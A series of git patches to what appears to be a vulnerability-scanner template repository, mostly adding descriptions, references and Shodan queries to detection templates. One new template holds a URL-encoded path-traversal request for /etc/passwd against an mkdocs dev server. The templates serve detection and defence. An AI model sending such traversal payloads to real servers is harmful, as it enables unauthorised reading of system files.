a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml new file mode 100644 index 0000000000..0c071a0eb1 --- /dev/null +++ b/cves/2021/CVE-2021-40978.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-40978 + +info: + name: mkdocs 1.2.2 built-in dev-server allows directory traversal + author: pikpikcu + severity: high + reference: https://github.com/nisdn/CVE-2021-40978 + tags: cve,cve2021,mkdocs,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + condition: and + + - type: status + status: + - 200 From 96b1add109ae353301fce5b86ca3914a057945dd Mon Sep 17 00:00:00 2001 From: Divya Date: Wed, 13 Oct 2021 22:43:02 -0400 Subject: [PATCH 2898/4083] Add ms-active-directory-certificate-services-detect.yaml Detect MS Active Director Certificate Services --- ...directory-certificate-services-detect.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposed-panels/ms-active-directory-certificate-services-detect.yaml diff --git a/exposed-panels/ms-active-directory-certificate-services-detect.yaml b/exposed-panels/ms-active-directory-certificate-services-detect.yaml new file mode 100644 index 0000000000..d64fbbf1f9 --- /dev/null +++ b/exposed-panels/ms-active-directory-certificate-services-detect.yaml @@ -0,0 +1,31 @@ +id: ms-active-directory-certificate-services-detect + +info: + name: MS Active Directory Certificate Services Detector + author: divya_mudgal + severity: info + tags: ms,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 302 + - 301 + condition: or + + - type: word + words: + - "/certsrv" + - "/certsrv/" + - "/certsrv/Default.asp" + - "/CertSrv" + - "/CertSrv/" + - "/CertSrv/Default.asp" + part: header + condition: or \ No newline at end of file From 1e4fae76a3790e65c4a42cf49fb34d128d98d565 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Oct 2021 09:23:48 +0530 Subject: [PATCH 2899/4083] Update CVE-2021-40978.yaml --- cves/2021/CVE-2021-40978.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml index 0c071a0eb1..47dae4ec2f 100644 --- a/cves/2021/CVE-2021-40978.yaml +++ b/cves/2021/CVE-2021-40978.yaml @@ -1,10 +1,12 @@ id: CVE-2021-40978 info: - name: mkdocs 1.2.2 built-in dev-server allows directory traversal + name: mkdocs 1.2.2 built-in dev-server allows directory traversal author: pikpikcu severity: high - reference: https://github.com/nisdn/CVE-2021-40978 + reference: + - https://github.com/nisdn/CVE-2021-40978 + - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 tags: cve,cve2021,mkdocs,lfi requests: @@ -19,7 +21,6 @@ requests: regex: - "root:[x*]:0:0:" part: body - condition: and - type: status status: From 742677870acaa31c8ac81023dbde4e79b26e9a7d Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 14 Oct 2021 03:52:10 -0300 Subject: [PATCH 2900/4083] Update CVE-2021-41773.yaml shodan query added --- cves/2021/CVE-2021-41773.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index 430a5c5bb9..473c7adbcb 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -17,6 +17,8 @@ info: cvss-score: 7.50 cve-id: CVE-2021-41773 cwe-id: CWE-22 + metadata: + shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49 requests: - raw: @@ -42,4 +44,4 @@ requests: - type: word name: RCE words: - - "CVE-2021-41773" \ No newline at end of file + - "CVE-2021-41773" From dd6d37ccf27fad87473b5256840e1edbc629d094 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 14 Oct 2021 03:57:33 -0300 Subject: [PATCH 2901/4083] Update confluence-detect.yaml shodan-query added --- technologies/confluence-detect.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/technologies/confluence-detect.yaml b/technologies/confluence-detect.yaml index 168a3b1f53..c9739d4338 100644 --- a/technologies/confluence-detect.yaml +++ b/technologies/confluence-detect.yaml @@ -7,6 +7,9 @@ info: description: Allows you to detect Atlassian Confluence instances tags: tech,confluence +metadata: + shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 + requests: - method: GET path: From e1adf856e4cbec5b02480a22900441e6589d9efd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 14 Oct 2021 10:52:45 +0000 Subject: [PATCH 2902/4083] Auto Generated CVE annotations [Thu Oct 14 10:52:45 UTC 2021] :robot: --- cves/2021/CVE-2021-40978.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml index 47dae4ec2f..2273074039 100644 --- a/cves/2021/CVE-2021-40978.yaml +++ b/cves/2021/CVE-2021-40978.yaml @@ -8,6 +8,7 @@ info: - https://github.com/nisdn/CVE-2021-40978 - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 tags: cve,cve2021,mkdocs,lfi + description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1." requests: - method: GET From e6219083f31f985e609890d603f1d518ccb41d19 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Oct 2021 16:22:58 +0530 Subject: [PATCH 2903/4083] Update confluence-detect.yaml --- technologies/confluence-detect.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/technologies/confluence-detect.yaml b/technologies/confluence-detect.yaml index c9739d4338..90c286c9a2 100644 --- a/technologies/confluence-detect.yaml +++ b/technologies/confluence-detect.yaml @@ -5,10 +5,9 @@ info: author: philippedelteil severity: info description: Allows you to detect Atlassian Confluence instances - tags: tech,confluence - -metadata: - shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 + tags: tech,confluence,atlassian + metadata: + shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 requests: - method: GET From 3191ba6e96493d3ddb7be9fa23bc711dba4292fa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Oct 2021 16:25:43 +0530 Subject: [PATCH 2904/4083] Update confluence-detect.yaml --- technologies/confluence-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/confluence-detect.yaml b/technologies/confluence-detect.yaml index 90c286c9a2..ba239b67f4 100644 --- a/technologies/confluence-detect.yaml +++ b/technologies/confluence-detect.yaml @@ -7,7 +7,7 @@ info: description: Allows you to detect Atlassian Confluence instances tags: tech,confluence,atlassian metadata: - shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 + shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 requests: - method: GET From 4ce3559d58fa97bb97cf8af0bc4b486802f5ae48 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Oct 2021 16:29:47 +0530 Subject: [PATCH 2905/4083] Update and rename wp-cherry-plugin-file-download.yaml to vulnerabilities/wordpress/cherry-file-download.yaml --- .../wordpress/cherry-file-download.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) rename wp-cherry-plugin-file-download.yaml => vulnerabilities/wordpress/cherry-file-download.yaml (50%) diff --git a/wp-cherry-plugin-file-download.yaml b/vulnerabilities/wordpress/cherry-file-download.yaml similarity index 50% rename from wp-cherry-plugin-file-download.yaml rename to vulnerabilities/wordpress/cherry-file-download.yaml index 15172ced12..3597e4d780 100644 --- a/wp-cherry-plugin-file-download.yaml +++ b/vulnerabilities/wordpress/cherry-file-download.yaml @@ -1,11 +1,14 @@ -id: wp-cherry-plugin-file-download +id: cherry-file-download info: name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download author: 0x_Akoko severity: high - tags: wordpress,wp-plugin,lfi,wp - reference: https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee + description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. + reference: + - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee + - https://github.com/CherryFramework/cherry-plugin + tags: wordpress,wp-plugin,lfi requests: - method: GET From 02d00716604fa8f15ff499255192633dd6175f01 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Oct 2021 16:33:38 +0530 Subject: [PATCH 2906/4083] Update and rename aspose-words-exporter-file-download.yaml to vulnerabilities/wordpress/aspose-words-file-download.yaml --- .../wordpress/aspose-words-file-download.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) rename aspose-words-exporter-file-download.yaml => vulnerabilities/wordpress/aspose-words-file-download.yaml (62%) diff --git a/aspose-words-exporter-file-download.yaml b/vulnerabilities/wordpress/aspose-words-file-download.yaml similarity index 62% rename from aspose-words-exporter-file-download.yaml rename to vulnerabilities/wordpress/aspose-words-file-download.yaml index f75904a727..6cf04ee7eb 100644 --- a/aspose-words-exporter-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-words-file-download.yaml @@ -1,11 +1,14 @@ -id: aspose-words-exporter-file-download +id: aspose-words-file-download info: name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download author: 0x_Akoko severity: high - tags: wordpress,wp-plugin,lfi,wp - reference: https://wpscan.com/vulnerability/7869 + description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + reference: + - https://wpscan.com/vulnerability/7869 + - https://wordpress.org/plugins/aspose-doc-exporter + tags: wordpress,wp-plugin,lfi requests: - method: GET From 5453f2ccdb558a3481381c609078e09517f8ded8 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 15:35:37 +0300 Subject: [PATCH 2907/4083] Add description --- vulnerabilities/wordpress/attitude-theme-open-redirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml index de51dfbd25..27dc936559 100644 --- a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml +++ b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: WordPress Attitude Themes 1.1.1 Open Redirection author: 0x_Akoko severity: low + description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it. reference: https://cxsecurity.com/issue/WLB-2020030185 tags: wordpress,wp-theme,redirect From 4275cce69aa132f3d0413a29d749636dd3d4a078 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 15:35:42 +0300 Subject: [PATCH 2908/4083] Add description --- vulnerabilities/wordpress/brandfolder-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/brandfolder-lfi.yaml b/vulnerabilities/wordpress/brandfolder-lfi.yaml index 54d3abbe1b..2cb1f03bf0 100644 --- a/vulnerabilities/wordpress/brandfolder-lfi.yaml +++ b/vulnerabilities/wordpress/brandfolder-lfi.yaml @@ -4,6 +4,7 @@ info: name: Wordpress brandfolder plugin - RFI & LFI author: 0x_Akoko severity: high + description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content. reference: - https://www.exploit-db.com/exploits/39591 - https://cxsecurity.com/issue/WLB-2016030120 From e599ba12616d39aa96433dfffcb7679cf87469a5 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 15:35:47 +0300 Subject: [PATCH 2909/4083] Add description --- vulnerabilities/wordpress/brandfolder-open-redirect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml index 5811edcd94..ddc524d0fc 100644 --- a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml +++ b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml @@ -1,9 +1,10 @@ id: brandfolder-open-redirect info: - name: Wordpress brandfolder plugin Open Redirect + name: WordPress Brandfolder Plugin Open Redirect author: 0x_Akoko severity: low + description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it. reference: https://www.exploit-db.com/exploits/39591 tags: wordpress,wp-plugin,lfi,rfi From d1105f1d79a6d24f9efd5da422efbd052e0e273c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 15:35:52 +0300 Subject: [PATCH 2910/4083] Add description --- vulnerabilities/wordpress/issuu-panel-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/issuu-panel-lfi.yaml b/vulnerabilities/wordpress/issuu-panel-lfi.yaml index 079a043e95..d2ecd930f2 100644 --- a/vulnerabilities/wordpress/issuu-panel-lfi.yaml +++ b/vulnerabilities/wordpress/issuu-panel-lfi.yaml @@ -4,6 +4,7 @@ info: name: Wordpress Plugin Issuu Panel - RFI & LFI author: 0x_Akoko severity: high + description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files. reference: https://cxsecurity.com/issue/WLB-2016030131 tags: wp-plugin,wordpress,lfi,rfi From 18e6257e33bae95f00e89d19e1a883612db053ab Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 15:54:28 +0300 Subject: [PATCH 2911/4083] description --- vulnerabilities/other/bitrix-open-redirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index 4b8022a318..4e13035c30 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: Bitrix Open URL redirect detection author: pikpikcu severity: low + description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html tags: redirect,bitrix From 39ebcc13a35a1fa29fa98e7f97c3e4a012905785 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 15:55:59 +0300 Subject: [PATCH 2912/4083] Add description --- vulnerabilities/other/dedecms-membergroup-sqli.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/dedecms-membergroup-sqli.yaml b/vulnerabilities/other/dedecms-membergroup-sqli.yaml index 4100d95baa..1adc04596d 100644 --- a/vulnerabilities/other/dedecms-membergroup-sqli.yaml +++ b/vulnerabilities/other/dedecms-membergroup-sqli.yaml @@ -4,6 +4,7 @@ info: name: DedeCMS Membergroup SQLI author: pikpikcu severity: medium + description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter. reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html tags: sqli,dedecms From 4b603769c5df8d7d13d2662654f0cb230caa669c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 15:59:38 +0300 Subject: [PATCH 2913/4083] Add vendor CERT advisory/cve --- vulnerabilities/other/ecoa-building-lfi.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/ecoa-building-lfi.yaml b/vulnerabilities/other/ecoa-building-lfi.yaml index fcaa63183d..16995240be 100644 --- a/vulnerabilities/other/ecoa-building-lfi.yaml +++ b/vulnerabilities/other/ecoa-building-lfi.yaml @@ -5,8 +5,10 @@ info: author: gy741 severity: high description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - tags: ecoa,lfi + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php + - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html + tags: ecoa,lfi,cve-2021-41291 requests: - raw: From 67a6e574a0ab8610e6e2b501878838e590159ad6 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:04:37 +0300 Subject: [PATCH 2914/4083] Add description --- vulnerabilities/other/geovision-geowebserver-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml index 8e4768db23..0d44379c8d 100644 --- a/vulnerabilities/other/geovision-geowebserver-lfi.yaml +++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -4,6 +4,7 @@ info: name: GeoVision Geowebserver 5.3.3 - LFI author: madrobot severity: high + description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. reference: https://www.exploit-db.com/exploits/50211 tags: geowebserver,lfi From 3322a4becc117b2ca9b38c3098d2e3f055693e05 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:05:47 +0300 Subject: [PATCH 2915/4083] Previous reference is no longer available --- vulnerabilities/other/geovision-geowebserver-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml index 0d44379c8d..c0e7dbfcad 100644 --- a/vulnerabilities/other/geovision-geowebserver-lfi.yaml +++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: high description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. - reference: https://www.exploit-db.com/exploits/50211 + reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,lfi requests: From 294678249332c05039e9653c07bd071adc723ff8 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:06:20 +0300 Subject: [PATCH 2916/4083] Fix name --- vulnerabilities/other/h3c-imc-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/h3c-imc-rce.yaml b/vulnerabilities/other/h3c-imc-rce.yaml index 470a86869d..eeba44407c 100644 --- a/vulnerabilities/other/h3c-imc-rce.yaml +++ b/vulnerabilities/other/h3c-imc-rce.yaml @@ -1,7 +1,7 @@ id: h3c-imc-rce info: - name: H3c IMC Rce + name: H3c IMC RCE author: pikpikcu severity: critical reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw From 083ca2805a2075e1e4b1e13895a47436dcc2fde6 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:07:18 +0300 Subject: [PATCH 2917/4083] Add description --- vulnerabilities/other/h3c-imc-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/h3c-imc-rce.yaml b/vulnerabilities/other/h3c-imc-rce.yaml index eeba44407c..082d17ddec 100644 --- a/vulnerabilities/other/h3c-imc-rce.yaml +++ b/vulnerabilities/other/h3c-imc-rce.yaml @@ -4,6 +4,7 @@ info: name: H3c IMC RCE author: pikpikcu severity: critical + description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitary commands via the 'dynamiccontent.properties.xhtml' endpoint reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw tags: rce,h3c-imc From eef7ba6cd43a204186889efeda9329bcf7b73a1f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:07:39 +0300 Subject: [PATCH 2918/4083] Spelling --- vulnerabilities/other/h3c-imc-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/h3c-imc-rce.yaml b/vulnerabilities/other/h3c-imc-rce.yaml index 082d17ddec..2c0133a076 100644 --- a/vulnerabilities/other/h3c-imc-rce.yaml +++ b/vulnerabilities/other/h3c-imc-rce.yaml @@ -4,7 +4,7 @@ info: name: H3c IMC RCE author: pikpikcu severity: critical - description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitary commands via the 'dynamiccontent.properties.xhtml' endpoint + description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw tags: rce,h3c-imc From e3071a4f26af847b77034b92e16164089844a6c6 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:10:54 +0300 Subject: [PATCH 2919/4083] Added description --- vulnerabilities/other/karel-ip-phone-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/karel-ip-phone-lfi.yaml b/vulnerabilities/other/karel-ip-phone-lfi.yaml index 8d8787781f..ad51213f64 100644 --- a/vulnerabilities/other/karel-ip-phone-lfi.yaml +++ b/vulnerabilities/other/karel-ip-phone-lfi.yaml @@ -4,6 +4,7 @@ info: name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal author: 0x_Akoko severity: high + description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. reference: - https://cxsecurity.com/issue/WLB-2020100038 - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon From 5618e8eaa989b569deebd57ac746ed8d849d8a5c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:27:26 +0300 Subject: [PATCH 2920/4083] Better description --- vulnerabilities/other/commax-biometric-auth-bypass.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/commax-biometric-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-auth-bypass.yaml index dfdc0ae4a8..dd820dfb22 100644 --- a/vulnerabilities/other/commax-biometric-auth-bypass.yaml +++ b/vulnerabilities/other/commax-biometric-auth-bypass.yaml @@ -4,7 +4,7 @@ info: name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass author: gy741 severity: critical - description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. + description: The COMMAX Biometric Access Control System suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. reference: - https://www.exploit-db.com/exploits/50206 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php From a6800e0e1aa2173094973cf2c102d482ae8aec85 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:28:41 +0300 Subject: [PATCH 2921/4083] Add description --- vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml index c03a8be40a..16884d7384 100644 --- a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml +++ b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml @@ -4,6 +4,7 @@ info: name: DedeCmsV5.6 Carbuyaction Fileinclude author: pikpikcu severity: high + description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter. reference: https://www.cnblogs.com/milantgh/p/3615986.html tags: dedecms From 6eaff09b16e74c7fd16be5c4e1011f575ae13bc4 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:29:51 +0300 Subject: [PATCH 2922/4083] Add description --- vulnerabilities/other/ecoa-building-automation-lfd.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/ecoa-building-automation-lfd.yaml b/vulnerabilities/other/ecoa-building-automation-lfd.yaml index 24d0554968..5a1e8fd815 100644 --- a/vulnerabilities/other/ecoa-building-automation-lfd.yaml +++ b/vulnerabilities/other/ecoa-building-automation-lfd.yaml @@ -3,6 +3,7 @@ info: name: ECOA Building Automation System - LFD author: 0x_Akoko severity: high + description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php tags: ecoa,lfi From 09de1430994b0a928fffcddc27d64d2330c43511 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:30:14 +0300 Subject: [PATCH 2923/4083] Add CVE --- vulnerabilities/other/ecoa-building-automation-lfd.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/ecoa-building-automation-lfd.yaml b/vulnerabilities/other/ecoa-building-automation-lfd.yaml index 5a1e8fd815..4035606811 100644 --- a/vulnerabilities/other/ecoa-building-automation-lfd.yaml +++ b/vulnerabilities/other/ecoa-building-automation-lfd.yaml @@ -5,7 +5,7 @@ info: severity: high description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - tags: ecoa,lfi + tags: ecoa,lfi,cve-2021-41293 requests: - raw: From 16dd5c6e8e620dbebeb34a90c3455d2722ddf107 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:30:44 +0300 Subject: [PATCH 2924/4083] More reference --- vulnerabilities/other/ecoa-building-automation-lfd.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/ecoa-building-automation-lfd.yaml b/vulnerabilities/other/ecoa-building-automation-lfd.yaml index 4035606811..0bb7b93633 100644 --- a/vulnerabilities/other/ecoa-building-automation-lfd.yaml +++ b/vulnerabilities/other/ecoa-building-automation-lfd.yaml @@ -4,7 +4,9 @@ info: author: 0x_Akoko severity: high description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php + - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html tags: ecoa,lfi,cve-2021-41293 requests: From 75f96128d594eabc500203ff895df96e2aac55d0 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:31:27 +0300 Subject: [PATCH 2925/4083] Better description --- vulnerabilities/other/fatpipe-backdoor.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/fatpipe-backdoor.yaml b/vulnerabilities/other/fatpipe-backdoor.yaml index dd1ccac475..98e6e53d22 100644 --- a/vulnerabilities/other/fatpipe-backdoor.yaml +++ b/vulnerabilities/other/fatpipe-backdoor.yaml @@ -4,7 +4,7 @@ info: name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account author: gy741 severity: high - description: The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. + description: FatPipe Networks has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php - https://www.fatpipeinc.com/support/advisories.php From 5a00c6841d21354855598f4d672cbdba8803aa7c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:32:15 +0300 Subject: [PATCH 2926/4083] Working link --- vulnerabilities/other/geovision-geowebserver-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml index f9c3d234be..ffd91e2209 100644 --- a/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -4,7 +4,7 @@ info: name: GeoVision Geowebserver 5.3.3 - XSS author: madrobot severity: medium - reference: https://www.exploit-db.com/exploits/50211 + reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,xss requests: From dbb28d586aec8f728d04354795262562042e35a0 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 14 Oct 2021 16:32:34 +0300 Subject: [PATCH 2927/4083] Add description --- vulnerabilities/other/geovision-geowebserver-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml index ffd91e2209..a047ed5e8b 100644 --- 